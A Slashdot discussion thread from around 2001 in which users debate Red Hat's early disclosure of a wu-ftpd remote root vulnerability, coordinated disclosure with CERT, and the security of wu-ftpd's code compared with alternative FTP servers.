Stop using stupid C language (3, Insightful)

Far (6486) | more than 12 years ago | (#2628076)

Using the C language to implement anything else but the lowest-level layers of a system is plain incompetence, all the more when security is involved. The criterium is simple: if there is ANY use of dynamic allocation, you should use a safe language like OCAML, CommonLISP, Mercury, Perl, Python, etc. [Of course, C may be used when *implementing* the dynamic allocation].

ssh too? (1)

hitchhacker (122525) | more than 12 years ago | (#2628078)

while we are on exploits,

Many implementations of ssh version 1 are vulnerable to a buffer overflow as well. Its a vulnerability in the protocol not the implementation. Last I checked (sunday), debians version of OpenSSH 1.2 from security.debian.org was still vulnerable. Though this is all speculation because no public exploit has been released. (there are exploits around though)

see bugtrack from weeks ago [securityfocus.net]

metric

Marketing move, or horrible mistake? (2)

LazyDawg (519783) | more than 12 years ago | (#2628090)

On the one hand, I can see Redhat getting into problems with people all over for un-leveling the playing field, breaking a gentleman's agreement with CERT, etc.

On the other, this could easily and very vocally show RedHat, true or not, to be a good OS if you want to avoid security vulnerabilities. FUD victims could be saying to themselves, "These other guys sit on their hands for over a week?? I'm going to go with redhat!"

Microsoft social engineers news stories like this all the time. Single examples that Lemmings treat as a global sample of productivity, security, programmers' skill, or whatever other wonderful thing the company wants to tote.

Slanted comment (0)

utdpenguin (413984) | more than 12 years ago | (#2628093)

"A remote exploitable vulnerability was found in wu_ftp, which is distributed in all major distros."


Interesting. On my computer proftpd is the ftp deamon of choice. Granted, this is slackware, which is arguably not a major distro, but Mandrake 8.1 uses it as well, and surely Mandrake is a major distro? They are the most popular, after all!

Not all major distros (1)

Emmet (70481) | more than 12 years ago | (#2628096)

Not Slackware.

On Slackware, there is no wu_ftp, there is no pam, there is no Vixie crond.

And there are very few security advisories.

Re:Not all major distros (0)

Anonymous Coward | more than 12 years ago | (#2628164)

Too bad pam is actually useful...

wuftpd is a security hole anyway (1)

HappyOscar (65200) | more than 12 years ago | (#2628099)

Why use wuftpd when it's so trivial to install proftpd (which is, incidentally, also easier to configure)? wuftpd is dangerous to run because it's so patched as to be in the same state BIND 8 is in. Honestly, just because it's the "default" doesn't make it acceptable to run a patchwork server. That's about as dangerous as running a Microsoft server just because it's "industry standard" (which isn't true anyway).

And just as an aside, I respect RedHat for preemptively notifying people, H4XX0R5 included. If Apache were to have a horrible root-access-blows-up-your-site kind of hole discovered, I'd want that kind of incentive to upgrade soon. It's better than saying "There's a hole, we're working on fixing it, just wait and hope that someone doesn't figure it out from our context clues".

'Early Disclosure' To Whom? (0)

Anonymous Coward | more than 12 years ago | (#2628117)


RedHat's 'Early Disclosure' isn't so early to any
crackers who already knew about the hole.

The sooner these things are revealed, the sooner people can switch to more secure alternatives.

The only sad part is that RedHat is apologizing for spilling the beans.

more to the story (5, Informative)

Phexro (9814) | more than 12 years ago | (#2628120)

item: the version of wu-ftpd that rh released was a pre-release from cvs. they changed the version number. this bug was fixed in cvs months ago.

item: the securityfocus vuln-help people are supposed to help coordinate vendors & the software maintainers. they sent notification of the bug to the wrong address, so the wu-ftpd developers weren't even aware that there was a bug present until the day the rh advisory went out.

item: there was supposed to be a coordinated advisory put out on dec. 3rd. rh preempted that, causing this nasty confusion.

greg lundberg posted a big explanation of what went on to several mailing lists... it should be on the wuftpd-questions [landfield.com] archive, but i don't see it there yet.

also, see the news item [securityfocus.com] at securityfocus about this.

Breech of Trust (2)

aridhol (112307) | more than 12 years ago | (#2628124)

Did RedHat breech trust with CERT? There was an exploit, sent out to vendors, along with an agreement not to leak it until the 3rd.

If there was a formal agreement not to release the information ahead of schedule, should this not be seen as a mark against RedHat?

Unfortunately, there is only one punishment I can see for this. RedHat should be removed from the mailing list for a specific amount of time, but not permanently.

The biggest problem I see with that is that it would hurt the customers, which is what we don't want.

Does anybody else have an idea of a suitable remedy?

Re:Breech of Trust (2)

The Man (684) | more than 12 years ago | (#2628151)

Actually I think all the vendors who agreed to delay releasing patches for a known severe problem have breached their customers' trust and should be punished. I would like to know what's going to be done to them. Maybe their customers should just stop doing business with them; that usually makes the problem go away on its own.

Stupid is as stupid does.. (1, Troll)

grub (11606) | more than 12 years ago | (#2628126)

a) install a secure by default OS such as OpenBSD
b) LEAVE FTP disabled
c) LEAVE Telnet disabled
d) ENABLE SFTP if you need an FTPish connection.

Live happy and don't end up like LinuxToday.com LOL

Know what you're doing. (3, Interesting)

rice_burners_suck (243660) | more than 12 years ago | (#2628131)

I think it's better that Red Hat released the advisory ahead of time. The faster sysadmins, programmers, and other users know about remote root exploits, the faster the exploit can be closed.

Of course, there are some folks out there who won't patch their system. For those people, advisories like this don't help at all. But then, if you're running anything important, you should take the time to learn how to properly configure and maintain the system. Trying to hide known exploits from the public only serves to make things more difficult and dangerous for those of us who DO know what we're doing.

In other words, if you don't know what you're doing, you shouldn't be using a computer.

OH WELL.

Probably already in use by the kiddies... (2)

Black Art (3335) | more than 12 years ago | (#2628138)

Linux Today's web site was defaced just a bit ago. may be coincidence or it may be the same hole.

What annoid me is that I read the warning on this and I could not make heads or tails what the actual cause of the hole was. And I am a programmer!

Security warning by obscurity?

Shame (3, Funny)

Syberghost (10557) | more than 12 years ago | (#2628146)

How dare those RedHat bastards fix a security problem early.

Hypocrisy Detected!!! (5, Insightful)

Pinball Wizard (161942) | more than 12 years ago | (#2628148)

Now wait a minute. Here on /., MS gets slammed because they want bugtraq and whoever to wait before they publicize a security hold until a fix can be reasonably made.


Now you guys are criticizing Red Hat for releasing information too quickly?!


Make up your minds. Either it is a Good Thing to release this sort of information to the public or not. IMO, if CERT is withholding information to the public that just gives a wiley cracker that much extra lead time to perform exploits. Whereas if the info was just released in the first place, at least people could turn their FTP servers yet, or switch to something like pure-ftp, which has yet to be cracked.


I agree with Red Hat on this one. They did people a favor by releasing the information.

No surprises here (5, Insightful)

Broccolist (52333) | more than 12 years ago | (#2628155)

Wu-FTPd has had a long history of security holes. It's practically the BIND of FTP servers.

I looked through the source of Wu-FTPd some time ago, when I was interested in adding support for an encrypted form of FTP proposed in a recent RFC (the protocol never caught on). What I found scared me. Most of the server is one humungous 8000-line C source file which appears to do pretty much everything.

Having quite a bit of experience with the FTP protocol, I expected to immediately understand what was going on, but at first glance, this code baffled me. It's full of pointer arithmetic and chains of if-statements performing mysterious, undecipherable operations on fixed-length arrays. It's not divided into clear levels of abstraction and I had difficulty telling what most functions were supposed to do, let alone what they actually did.

Anyway, I immediately gave up any thought of adding any new features to this godawful mess. Considering all the weird cruft that goes on in that code, it's no surprise to me that people are constantly finding new security holes in it. There are other featureful FTP servers out there; it's hard to see why distributions continue to include a bug-ridden program like Wu-FTPd as default in their distributions.

Load More Comments
Slashdot Account

Need an Account?

Forgot your password?

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>
Create a Slashdot Account

Loading...